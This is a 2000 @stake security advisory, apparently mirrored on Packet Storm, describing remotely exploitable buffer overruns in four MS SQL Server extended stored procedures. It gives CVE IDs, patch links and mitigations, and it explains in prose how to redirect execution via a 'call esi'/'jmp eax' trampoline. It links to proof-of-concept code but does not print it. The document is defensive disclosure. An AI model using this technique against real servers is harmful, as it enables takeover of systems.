Atstake Security Advisory A120100-1 - Microsoft's database server, known as SQL Server, contains several buffer overruns vulnerabilities that can be remotely exploited to execute arbitrary computer code on the affected system, thus allowing an attacker to gain complete control of the server. In situations where the SQL Server is protected by a firewall, it may still be possible to launch this attack through a connecting web server - though this depends on how secure the web server's application is. Proof of concept code available here.
7a62c36595e25982e5eb61be78940b169d48a8771ddd9252d29796af5fbdf890
@stake Inc.
www.atstake.com
Security Advisory
Advisory Name: Microsoft SQL Server Extended Stored Procedure
Vulnerability
Release Date: 12/01/2000
Application: MS SQL Server 7.0 - all service packs
MS SQL Server 2000
Platform: Windows NT 4.0 / 2000
Severity: There are several buffer overflow conditions
that could result in execution of arbitrary
code or a denial of service.
Authors: David Litchfield [dlitchfield@atstake.com]
Vendor Status: Vendor has patch, see below
Web: www.atstake.com/research/advisories/2000/a120100-1.txt
Overview:
Microsoft's database server, known as SQL Server, contains several
buffer overruns vulnerabilities that can be remotely exploited to execute
arbitrary computer code on the affected system, thus allowing an attacker
to gain complete control of the server. In situations where the SQL Server
is protected by a firewall, it may still be possible to launch this attack
through a connecting web server - though this depends on how secure the
web server's application is.
Details:
To add further functionality to SQL server there are extended
stored procedures that perform one task or another. When an overly long
string parameter is provided to several of these procedures a buffer is
overrun. Ironicly it appears that these overruns occur in part of the
exception handling calls made by SQL server to protect itself. The
procdures known to be vulnerable xp_displayparamstmt, xp_enumresultset,
xp_showcolv and xp_updatecolvbm. Each of these stored procedures are
exported by xprepl.dll and may be executed by PUBLIC, ostensibly everyone
who can login to the database server, even low privileged logins. If the
overruns are exploited the code runs in the context of the powerful SYSTEM
account.
Once the overflow occurs, the EAX register points to the user supplied
data and to force the processor to execute code supplied in this buffer
the saved return address would need to be overwritten by an address that
contained a 'jmp eax' or 'call eax' instruction. Examining the DLLs loaded
into the address space shows that the DLL with the vulnerability,
xprepl.dll, does not change across SQL service packs, with SQL Server 7,
at least. If such an instruction could be found in this DLLs address space
then any proof of concept code would work across all SQL service packs. As
it happens these instructions do not exist in this DLL. However, a 'call
esi' instruction exists and on overrun the esi register points to 4 bytes
above where the saved return address is overwritten. By overwriting the
saved return address with the address that contains the 'call esi'
instruction and by setting the bytes at esi to FF E0 (jmp eax), when the
'call esi' executes, the 'jmp eax' executes and the code has "stepped
over" the DWORD that overwrote the saved return address.
Proof of Concept:
Source code available at:
http://www.atstake.com/research/advisories/2000/sqladv-poc.c
Vendor Response:
Microsoft has released a bulletin describing this issue:
http://www.microsoft.com/technet/security/bulletin/ms00-092.asp
Microsoft has released a patch to fix this problem:
http://support.microsoft.com/support/sql/xp_security.asp
Recommendation:
Disallow PUBLIC execute access to these extended stored procedures usless
you need it.
Install the vendor supplied patch.
Common Vulnerabilities and Exposures (CVE) Information:
The Common Vulnerabilities and Exposures (CVE) project has assigned
the following names to these issues. These are candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.
xp_displayparamstmt - CAN-2000-1081
xp_enumresultset - CAN-2000-1082
xp_showcolv - CAN-2000-1083
xp_updatecolvbm - CAN-2000-1084
Advisory Release policy: http://www.atstake.com/research/policy/
For more advisories: http://www.atstake.com/research/advisories/
PGP Key: http://www.atstake.com/research/pgp_key.asc
Copyright 2000 @stake, Inc. All rights reserved
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed